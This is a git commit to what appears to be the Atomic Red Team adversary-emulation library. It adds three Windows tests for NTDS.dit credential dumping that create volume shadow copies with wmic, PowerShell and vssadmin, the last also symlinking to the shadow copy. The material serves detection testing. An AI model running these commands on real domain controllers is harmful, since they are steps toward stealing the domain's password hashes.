new atomics (#1098)

Co-authored-by: Patrick Bareiss <pbareib@splunk.com>
2020-06-30 16:34:07 +02:00
parent 2435846063
commit f7efbc9d6a
7 changed files with 269 additions and 8 deletions
@@ -176,6 +176,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
@@ -408,6 +408,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 credential-access,T1040,Network Sniffing,4,Packet Capture PowerShell,2bf62970-013a-4c74-b0a8-64030874e89a,powershell
 credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
@@ -390,6 +390,9 @@
  - Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows]
  - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
  - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+  - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+  - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux [linux]
  - Atomic Test #2: Packet Capture macOS [macos]
@@ -845,6 +845,9 @@
  - Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows]
  - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
  - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+  - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+  - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
  - Atomic Test #4: Packet Capture PowerShell [windows]
@@ -18176,12 +18176,14 @@ credential-access:
        elevation_required: true
    - name: Copy NTDS.dit from Volume Shadow Copy
      auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
-      description: "This test is intended to be run on a domain Controller.\n\nThe
-        Active Directory database NTDS.dit may be dumped by copying it from a Volume
-        Shadow Copy.\n\nThis test requires steps taken in the test \"Create Volume
-        Shadow Copy with NTDS.dit\".\nA successful test also requires the export of
-        the SYSTEM Registry hive. \nThis test must be executed on a Windows Domain
-        Controller.\n"
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+        This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
+        A successful test also requires the export of the SYSTEM Registry hive.
+        This test must be executed on a Windows Domain Controller.
      supported_platforms:
      - windows
      input_arguments:
@@ -18249,6 +18251,71 @@ credential-access:
 '
        name: command_prompt
        elevation_required: true
+    - name: Create Volume Shadow Copy with WMI
+      auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+      supported_platforms:
+      - windows
+      input_arguments:
+        drive_letter:
+          description: Drive letter to source VSC (including colon)
+          type: String
+          default: 'C:'
+      dependencies:
+      - description: Target must be a Domain Controller
+        prereq_command: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
+          ProductType | findstr LanmanNT
+        get_prereq_command: echo Sorry, Promoting this machine to a Domain Controller
+          must be done manually
+      executor:
+        command: 'wmic shadowcopy call create Volume=#{drive_letter}
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Create Volume Shadow Copy with Powershell
+      auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+      supported_platforms:
+      - windows
+      input_arguments:
+        drive_letter:
+          description: Drive letter to source VSC (including colon)
+          type: String
+          default: 'C:'
+      executor:
+        command: "(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')\n"
+        name: powershell
+        elevation_required: true
+    - name: Create Symlink to Volume Shadow Copy
+      auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+      supported_platforms:
+      - windows
+      input_arguments:
+        drive_letter:
+          description: Drive letter to source VSC (including colon)
+          type: String
+          default: 'C:'
+        symlink_path:
+          description: symlink path
+          type: String
+          default: C:\Temp\vssstore
+      executor:
+        command: |
+          vssadmin.exe create shadow /for=#{drive_letter}
+          mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+        name: command_prompt
+        elevation_required: true
  T1040:
    technique:
      id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
@@ -20,6 +20,12 @@ The following tools and techniques can be used to enumerate the NTDS file and th

 - [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil)

+- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
+
+- [Atomic Test #5 - Create Volume Shadow Copy with Powershell](#atomic-test-5---create-volume-shadow-copy-with-powershell)
+
+- [Atomic Test #6 - Create Symlink to Volume Shadow Copy](#atomic-test-6---create-symlink-to-volume-shadow-copy)
+

 <br/>

@@ -72,7 +78,7 @@ This test is intended to be run on a domain Controller.
 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

 This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
-A successful test also requires the export of the SYSTEM Registry hive. 
+A successful test also requires the export of the SYSTEM Registry hive.
 This test must be executed on a Windows Domain Controller.

 **Supported Platforms:** Windows
@@ -189,4 +195,111 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually



+<br/>
+<br/>
+
+## Atomic Test #4 - Create Volume Shadow Copy with WMI
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+wmic shadowcopy call create Volume=#{drive_letter}
+```
+
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Target must be a Domain Controller
+##### Check Prereq Commands:
+```cmd
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+```
+##### Get Prereq Commands:
+```cmd
+echo Sorry, Promoting this machine to a Domain Controller must be done manually
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Create Volume Shadow Copy with Powershell
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Create Symlink to Volume Shadow Copy
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+| symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+vssadmin.exe create shadow /for=#{drive_letter}
+mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+```
+
+
+
+
+
+
 <br/>
@@ -35,7 +35,7 @@ atomic_tests:
    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

    This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
-    A successful test also requires the export of the SYSTEM Registry hive. 
+    A successful test also requires the export of the SYSTEM Registry hive.
    This test must be executed on a Windows Domain Controller.
  supported_platforms:
  - windows
@@ -111,3 +111,72 @@ atomic_tests:
      rmdir /q /s #{output_folder}
    name: command_prompt
    elevation_required: true
+
+- name: Create Volume Shadow Copy with WMI
+  auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: 'C:'
+  dependencies:
+  - description: |
+      Target must be a Domain Controller
+    prereq_command: |
+      reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
+    get_prereq_command: |
+      echo Sorry, Promoting this machine to a Domain Controller must be done manually
+  executor:
+    command: |
+      wmic shadowcopy call create Volume=#{drive_letter}
+    name: command_prompt
+    elevation_required: true
+
+- name: Create Volume Shadow Copy with Powershell
+  auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: 'C:'
+  executor:
+    command: |
+      (gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
+    name: powershell
+    elevation_required: true
+
+- name: Create Symlink to Volume Shadow Copy
+  auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: 'C:'
+    symlink_path:
+      description: symlink path
+      type: String
+      default: 'C:\Temp\vssstore'
+  executor:
+    command: |
+      vssadmin.exe create shadow /for=#{drive_letter}
+      mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+    name: command_prompt
+    elevation_required: true